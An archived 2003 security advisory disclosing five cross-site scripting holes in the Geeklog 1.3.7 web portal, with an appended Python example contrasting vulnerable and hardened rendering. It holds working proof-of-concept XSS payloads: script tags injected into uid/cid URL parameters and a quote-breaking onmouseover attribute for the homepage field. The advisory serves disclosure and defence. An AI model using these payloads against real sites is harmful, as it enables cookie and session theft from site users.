Multiple XSS in Geeklog 1.3.7

From: snooq (jinyeanat_private)
Date: Mon Jan 13 2003 - 18:43:01 PST


    
    nothing new. typical XSS bugs.
    
    summary
    =======
    
    Geeklog is a web portal system written in PHP.
    There are five XSS holes in version 1.3.7 of the software.
    
    
    the 'holes'
    ===========
    
    --1--
    http://vulnerable.host/profiles.php?uid=<script>alert(document.cookie)</script>
    
    --2--
    http://vulnerable.host/users.php?mode=profile&uid=<script>alert(document.cookie)</script>
    
    --3--
    http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>
    
    
    --4--
    http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>
    	
    
    --5--
    'homepage' field in the user's account information page
    is not sanitised properly. The stored value is written into a
    double-quoted HTML attribute, so a '"' in it ends that attribute
    and anything after it becomes a new attribute. As a result,
    JavaScript can be injected by setting the 'homepage' field like this:
    
    http://url" onmouseover="alert(document.cookie)
    
    
    ** 3) & 4) were found by Dirk Haun of Geeklog Team. 
    
    
    vendor status
    =============
    
    03/01/2003
    contacted Dirk Haun of Geeklog team
    14/01/2003
    Geeklog 1.3.7sr1 was released.
    New version closes all holes found.
    
    
    --==snooq==--
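The advisory lists two distinct patterns: holes 1 to 4 reflect a query parameter that should only ever be an integer (uid, cid) straight back into the page, and hole 5 stores a free-text 'homepage' value and later drops it into a quoted attribute. The Python below is an added example, not Geeklog's code: it models each unsafe rendering next to a hardened form (integer validation for the id parameters; URL-scheme allowlisting plus attribute-context escaping for the homepage field). The HTML templates, function names and the simple event-handler detector are assumptions for illustration; the two payloads are copied from the PoC URLs above.

```python
"""Model of the two XSS patterns in the Geeklog 1.3.7 advisory.

Added example, not Geeklog's own code. The markup templates below are
assumed stand-ins for the real profile/comment pages.
"""
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Payloads constructed from the advisory's PoC URLs.
SCRIPT_PAYLOAD = "<script>alert(document.cookie)</script>"
HOMEPAGE_PAYLOAD = 'http://url" onmouseover="alert(document.cookie)'


# --- holes 1-4: a numeric id (uid, cid) echoed back into the page unescaped ---

def render_uid_unsafe(uid: str) -> str:
    """Reflect the raw query parameter into a message (the vulnerable pattern)."""
    return f"<p>User {uid} does not exist.</p>"


def parse_uid(uid: str) -> Optional[int]:
    """Hardened: a user id is a small non-negative integer; reject anything else.

    Validating the type removes the need to escape at all, because no
    attacker-controlled bytes survive into the output.
    """
    return int(uid) if re.fullmatch(r"[0-9]{1,10}", uid) else None


def render_uid_safe(uid: str) -> str:
    n = parse_uid(uid)
    if n is None:
        return "<p>Invalid user id.</p>"  # fixed string, nothing from the request
    return f"<p>User {n} does not exist.</p>"


# --- hole 5: stored 'homepage' value placed inside a double-quoted attribute ---

def render_homepage_unsafe(homepage: str) -> str:
    """The stored string is interpolated as-is, so a '"' closes the href."""
    return f'<a href="{homepage}">homepage</a>'


def sanitise_homepage(homepage: str) -> Optional[str]:
    """Hardened: allowlist the URL scheme, then escape for the attribute context.

    The scheme check blocks javascript: and data: URLs, which escaping alone
    would not stop. html.escape(quote=True) turns '"' into &quot;, so an
    injected onmouseover= stays inside the href value as inert text.
    """
    parts = urlsplit(homepage)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return html.escape(homepage, quote=True)


def render_homepage_safe(homepage: str) -> str:
    safe = sanitise_homepage(homepage)
    if safe is None:
        return "homepage"  # render no link rather than a rejected URL
    return f'<a href="{safe}">homepage</a>'


# Crude check used to compare the two renderings: a bare on*="..." attribute.
EVENT_HANDLER = re.compile(r'\s(on[a-z]+)\s*=\s*"', re.I)


def has_injected_handler(markup: str) -> bool:
    return bool(EVENT_HANDLER.search(markup))


if __name__ == "__main__":
    print(render_uid_unsafe(SCRIPT_PAYLOAD))
    print(render_uid_safe(SCRIPT_PAYLOAD))
    print(render_homepage_unsafe(HOMEPAGE_PAYLOAD))
    print(render_homepage_safe(HOMEPAGE_PAYLOAD))
```

The two fixes are deliberately different: for the id parameters the right control is type validation at the boundary, while for the homepage field the value legitimately is a string, so the control has to be escaping chosen for the exact context it lands in (a double-quoted attribute) plus a scheme allowlist, since escaping does nothing against a javascript: URL.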
    



    This archive was generated by hypermail 2b30 : Sun Jan 19 2003 - 21:24:03 PST